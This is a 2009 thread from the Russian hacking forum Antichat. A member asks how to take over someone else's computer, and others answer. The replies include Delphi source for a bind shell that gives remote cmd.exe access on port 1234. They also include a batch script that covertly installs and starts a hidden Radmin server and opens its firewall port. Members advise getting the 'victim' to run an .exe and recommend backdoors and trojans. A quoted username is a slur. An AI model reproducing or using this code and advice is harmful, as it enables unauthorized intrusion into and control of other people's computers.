Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
расскажите(напишите) подробно как в чужом компе шарить, что нужно для этого? |
28.04.2009, 12:22
|
|
Новичок
Регистрация: 05.01.2009
Сообщений: 11
Провел на форуме:
26593
Репутация:
0
|
|
расскажите(напишите) подробно как в чужом компе шарить, что нужно для этого?
как в чужом компе шарить, что нужно для этого? мне какой нить трояна ему надо да и через неттул?
|
|
|
28.04.2009, 12:26
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от nigger
как в чужом компе шарить, что нужно для этого? мне какой нить трояна ему надо да и через неттул?
Если у жертвы внешний IP (что встречается крааайне редко) то любым бекдором.
Для остальных есть особый бекдор с новым подходом
|
|
|
|
28.04.2009, 12:46
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
RAdmin-ом шарить))
|
|
|
|
28.04.2009, 18:00
|
|
Новичок
Регистрация: 07.03.2009
Сообщений: 3
Провел на форуме:
1286
Репутация:
0
|
|
Сообщение от root_sashok
RAdmin-ом шарить))
а радмином можно только после разрешения юзера или он должен быть включен
|
|
|
|
30.04.2009, 12:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
запусти этот код на компе жертвы и лезей сколько угодно (если не стоит фаера и нет Ната) или перекодить на connect back. А так коннетится на порт 1234 главное WSAStartup незабыть сделать
Код:
var
StartupInfo:_STARTUPINFOA;
addr,caddr:tsockaddrin;
ProcessInformation:_PROCESS_INFORMATION;
addrlen:integer;
cl:LongWord;
l:integer;
c:char;
begin
sock:=WSASocketA(2,1,6,nil,0,0);
if sock=INVALID_SOCKET then exit;
addr.sin_family:=AF_INET;
addr.sin_addr.s_addr:=0;
addr.sin_port:=htons(1234);
bind(sock,@addr, sizeof(addr));
listen(sock,$7FFFFFFF);
addrlen:=sizeof(caddr);
while true do
begin
cl:=accept(sock,caddr,addrlen);
if cl=INVALID_SOCKET then continue;
fillchar(StartupInfo,sizeof(StartupInfo),0);
StartupInfo.cb:=sizeof(StartupInfo);
StartupInfo.dwFlags:=$100;
StartupInfo.hStdInput:=cl;
StartupInfo.hStdOutput:=cl;
StartupInfo.hStdError:=cl;
CreateProcessA(nil,'cmd.exe',nil,nil,$00000001,$8000040,nil,nil,StartupInfo,ProcessInformation);
end;
closesocket(sock);
end;
|
|
|
|
30.04.2009, 13:32
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275
Репутация:
127
|
|
Hidden сборкой рАдмина
|
|
|
|
30.04.2009, 13:49
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 904
Провел на форуме:
4037638
Репутация:
1821
|
|
Ыыыы, slesh порадовал)))...
+
|
|
|
|
30.04.2009, 18:10
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929
Репутация:
395
|
|
Если локальная сеть зная логин и пасс пользователя... или же если открыт гостевой доступ... то можно тупа подключить сетевой диск 'net use /?' читай...
есть еще стандартный виндовый удалленный рабочий стол. есть радмин
настройки сервера (которого будешь ставить юзеру) настраиваешь у себя бекапишь веточку реестра... а патом батником или напрограммируй незаметненько
Код:
copy ".\file\r_server.exe" "%WinDir%\system32\r_server.exe"
copy ".\file\raddrv.dll" "%WinDir%\system32\raddrv.dll"
copy ".\file\admdll.dll" "%WinDir%\system32\admdll.dll"
regedit.exe /s ".\file\settings.reg"
netsh firewall add portopening TCP 4899 admin
%WinDir%\system32\r_server.exe /install /silence
%WinDir%\system32\r_server.exe /start
slesh, тоже тему говорит бек дор хорошая штука ) но всеже если есть доступ на машину можно и радмина стартануть )
опять же всевозможные сплоиты и сканеры.
в старадавние времена я пользовался лишь Legion-ом
Сообщение от http://www.inattack.ru/program/109.html
Программа Legion является одним из найболее популярных средств сканирования удаленных компьютеров на наличие share-файлов с последующей возможностью их копирования, стирания и изменения.
|
|
|
|
04.05.2009, 16:24
|
|
Участник форума
Регистрация: 22.11.2008
Сообщений: 142
Провел на форуме:
636446
Репутация:
32
|
|
Извиняюсь, я в лазини по чужим компа не великий спец, но заинтересовало
Получается, если на компе WinXP и внешний IP адрес, то можно лазить куды угодно?
Или как?
Прошу разъяснить вопрос.
|
|
|
|
09.08.2009, 17:18
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Flenov
Извиняюсь, я в лазини по чужим компа не великий спец, но заинтересовало
Получается, если на компе WinXP и внешний IP адрес, то можно лазить куды угодно?
Или как?
Прошу разъяснить вопрос.
Если на компе любая версия Windows + внешний айпи то да, впарив .exe ты можешь лазить по компу.
Под внешний IP есть много бесплатных бекдоров.
А если у жертвы NAT (отсутствие внешнего IP, у большинства именно NAT), то тут только платные бекдоры. (см. второе сообщение в этой теме)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
